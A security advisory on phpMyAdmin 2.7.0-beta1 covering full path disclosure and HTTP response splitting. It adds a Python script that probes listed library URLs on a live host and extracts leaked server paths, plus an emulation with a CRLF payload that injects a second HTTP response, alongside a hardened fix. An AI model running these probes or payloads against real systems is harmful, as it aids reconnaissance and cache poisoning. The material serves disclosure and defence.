phpMyAdmin is "a tool written in PHP intended to handle the administration of MySQL over the Web. Currently it can create and drop databases, create/drop/alter tables, delete/edit/add fields, execute any SQL statement, manage keys on fields".
Multiple security vulnerabilities have been found in phpMyAdmin. They range from full path disclosure to HTTP response splitting, which a remote attacker can perform without authentication.
Vulnerable Systems:
* phpMyAdmin version 2.7.0-beta1
Full Path Disclosures: requesting any of the following library files directly, rather than through the application, makes PHP emit an error message that includes the file's absolute path on the server (when PHP is configured to display errors). Where a particular query string is needed to reach the error, it is shown in parentheses:
libraries/string.lib.php
libraries/storage_engines.lib.php
libraries/sqlparser.lib.php
libraries/sql_query_form.lib.php
libraries/select_theme.lib.php
libraries/select_lang.lib.php
libraries/relation_cleanup.lib.php
libraries/left_header.inc.php
libraries/import.lib.php
libraries/header_meta_style.inc.php
libraries/grab_globals.lib.php
libraries/get_foreign.lib.php (get_foreign.lib.php?field=foo&foreigners[foo]=foo)
libraries/display_tbl_links.lib.php (display_tbl_links.lib.php?doWriteModifyAt=left&edit_url=foo)
libraries/display_import.lib.php
libraries/display_export.lib.php
libraries/display_create_table.lib.php
libraries/display_create_database.lib.php
libraries/db_table_exists.lib.php
libraries/database_interface.lib.php
libraries/common.lib.php
libraries/check_user_privileges.lib.php
libraries/charset_conversion.lib.php (charset_conversion.lib.php?cfg[AllowAnywhereRecoding]=true&allow_recoding=true)
libraries/sqlvalidator.lib.php (libraries/sqlvalidator.lib.php?cfg[SQLValidator]=use=TRUE)
libraries/import/sql.php
libraries/fpdf/ufpdf.php
libraries/auth/cookie.auth.lib.php (libraries/auth/cookie.auth.lib.php?coming_from_common=true)
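The following is an added example and not code from the advisory or from phpMyAdmin. It builds the probe URLs for a few of the paths listed above and shows how the leaked path is recognised in a response: PHP's standard error line names the file and line number, with or without the `<b>` tags that html_errors adds. The sample response is constructed, and the base URL and install directory in it are assumptions.

```python
import os
import re
import sys
from urllib.parse import urljoin

# A subset of the library files the advisory lists, with the query strings it
# gives for the cases that need one to reach the error path.
FPD_PATHS = [
    "libraries/string.lib.php",
    "libraries/common.lib.php",
    "libraries/get_foreign.lib.php?field=foo&foreigners[foo]=foo",
    "libraries/display_tbl_links.lib.php?doWriteModifyAt=left&edit_url=foo",
    "libraries/charset_conversion.lib.php?cfg[AllowAnywhereRecoding]=true&allow_recoding=true",
    "libraries/sqlvalidator.lib.php?cfg[SQLValidator]=use=TRUE",
    "libraries/auth/cookie.auth.lib.php?coming_from_common=true",
]

# PHP's error line, e.g. "Warning:  <message> in /abs/path/file.php on line N",
# optionally wrapped in <b> tags when html_errors is on. Group 1 is the path,
# group 2 the line number. Unix and Windows absolute paths are both accepted.
PHP_ERROR_RE = re.compile(
    r"(?:Warning|Notice|Fatal error|Parse error)(?:</b>)?:\s+[^\r\n]*?\bin\s+(?:<b>)?"
    r"((?:/|[A-Za-z]:\\)[^<\r\n]+?\.php)(?:</b>)?\s+on\s+line\s+(?:<b>)?(\d+)"
)


def probe_urls(base_url):
    """Full URLs to request for a given phpMyAdmin base URL (trailing slash expected)."""
    return [urljoin(base_url, p) for p in FPD_PATHS]


def find_path_disclosures(body):
    """(absolute path, line number) for every PHP error in a response that names a file."""
    return [(m.group(1), int(m.group(2))) for m in PHP_ERROR_RE.finditer(body)]


def install_root(path):
    """The phpMyAdmin install directory implied by a leaked libraries/ path."""
    for sep in ("/libraries/", "\\libraries\\"):
        i = path.find(sep)
        if i != -1:
            return path[:i]
    return os.path.dirname(path)


# Constructed response in the shape PHP produces with display_errors=On and
# html_errors=On; the messages and the /var/www/html/phpMyAdmin directory are made up.
SAMPLE_RESPONSE = (
    "<br />\n<b>Warning</b>:  Undefined variable: cfg in "
    "<b>/var/www/html/phpMyAdmin/libraries/string.lib.php</b> on line <b>24</b><br />\n"
    "<br />\n<b>Fatal error</b>:  Call to undefined function foo() in "
    "<b>/var/www/html/phpMyAdmin/libraries/string.lib.php</b> on line <b>31</b><br />\n"
)

if __name__ == "__main__":
    if len(sys.argv) > 1:
        # Live probe of a base URL given on the command line, e.g. http://host/phpMyAdmin/
        from urllib.error import HTTPError
        from urllib.request import urlopen
        for url in probe_urls(sys.argv[1]):
            try:
                body = urlopen(url, timeout=10).read().decode("utf-8", "replace")
            except HTTPError as err:   # a 500 from a fatal error still carries the message
                body = err.read().decode("utf-8", "replace")
            for path, line in find_path_disclosures(body):
                print(url, "->", install_root(path), "(line", line, ")")
    else:
        for path, line in find_path_disclosures(SAMPLE_RESPONSE):
            print(path, line, "->", install_root(path))
```

Only the presence of an absolute path matters for the finding; the line number is kept because it tells you which error you hit, which is useful when the same file leaks the path through more than one code path.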
HTTP Response Splitting in libraries/header_http.inc.php:
The script does not check whether it was included by the application or requested directly. When it is requested directly on a server with register_globals enabled, request parameters populate the variables whose values it writes into HTTP headers, so a parameter containing CR/LF sequences ends the header block early and lets a remote attacker append headers and a second response of their choosing (HTTP response splitting). Two caveats for anyone assessing exposure: register_globals has defaulted to off since PHP 4.2.0, and PHP 4.4.2 and 5.1.2 made header() refuse values that contain a newline, so the attack needs an older PHP with register_globals turned on.
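The following is an added example, not code from the advisory or from phpMyAdmin. It emulates, in Python, a library file that writes a global variable into a Content-Type header with register_globals on, splits the resulting byte stream the way a Content-Length-honouring client would, and shows a hardened version with a direct-access guard and header validation. The parameter name `charset`, the define()-style include guard, and the payload are assumptions for illustration; the advisory names neither the injected variable nor the fix.

```python
import re

CRLF = "\r\n"

# Constructed attacker value for the hypothetical 'charset' parameter: it closes
# the legitimate header block early and appends a complete second response.
SPLIT_PAYLOAD = (
    "utf-8" + CRLF
    + "Content-Length: 0" + CRLF + CRLF
    + "HTTP/1.1 200 OK" + CRLF
    + "Content-Type: text/html" + CRLF
    + "Content-Length: 17" + CRLF + CRLF
    + "<html>evil</html>"
)

STATUS_LINE_RE = re.compile(r"^HTTP/1\.[01] \d{3} [^\r\n]*\r\n", re.M)


def vulnerable_header_block(params, register_globals=True):
    """Emulates a library file emitting headers from a global that, with
    register_globals=On, is populated straight from the query string.
    (The parameter name 'charset' is an assumption for illustration.)"""
    charset = "utf-8"
    if register_globals and "charset" in params:
        charset = params["charset"]  # attacker-controlled, never validated
    lines = [
        "HTTP/1.1 200 OK",
        "Pragma: no-cache",
        "Content-Type: text/html; charset=" + charset,
    ]
    return CRLF.join(lines) + CRLF + CRLF + "<html>legit</html>"


def parse_responses(raw):
    """Split a byte stream into (status line, body) pairs the way a client that
    honours Content-Length would, so an injected second response shows up."""
    out, pos = [], 0
    while True:
        m = STATUS_LINE_RE.search(raw, pos)
        if not m:
            break
        head_end = raw.find(CRLF + CRLF, m.end())
        if head_end == -1:
            break
        headers = raw[m.end():head_end]
        body_start = head_end + len(CRLF + CRLF)
        cl = re.search(r"^Content-Length:\s*(\d+)", headers, re.M | re.I)
        if cl:
            length = int(cl.group(1))
            body, pos = raw[body_start:body_start + length], body_start + length
        else:
            body, pos = raw[body_start:], len(raw)
        out.append((m.group(0).strip(), body))
    return out


class DirectAccess(Exception):
    """Raised when a library file is requested on its own instead of being included."""


def header_value(value):
    """Refuse CR/LF in a header value, which is also what PHP's header() does from 4.4.2/5.1.2."""
    if "\r" in value or "\n" in value:
        raise ValueError("CR/LF in header value")
    return value


def guarded_header_block(entered_via_app, charset="utf-8"):
    """Hardened emitter: refuse direct requests (emulating a define()-based
    include guard, an assumed mitigation) and take the charset from the
    application's own configuration, validated before use."""
    if not entered_via_app:
        raise DirectAccess("library file requested directly")
    lines = [
        "HTTP/1.1 200 OK",
        "Pragma: no-cache",
        "Content-Type: text/html; charset=" + header_value(charset),
    ]
    return CRLF.join(lines) + CRLF + CRLF + "<html>legit</html>"


if __name__ == "__main__":
    for status, body in parse_responses(vulnerable_header_block({"charset": SPLIT_PAYLOAD})):
        print(status, repr(body))
```

With the payload, the vulnerable emitter yields two responses: the first has an empty body (Content-Length: 0), the second carries the attacker's HTML, which is what a caching proxy or a browser would store or render under the phpMyAdmin origin. Turning register_globals off, or applying the guard, leaves a single response.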
Impact:
A remote attacker can use the path disclosures to learn the absolute installation path of phpMyAdmin on the server, information that helps in targeting other attacks. The HTTP response splitting vulnerability lets an attacker serve content of their choosing as if it came from the phpMyAdmin site, for example to poison a proxy cache or to run script in a user's browser, which can lead to user compromise amongst other things.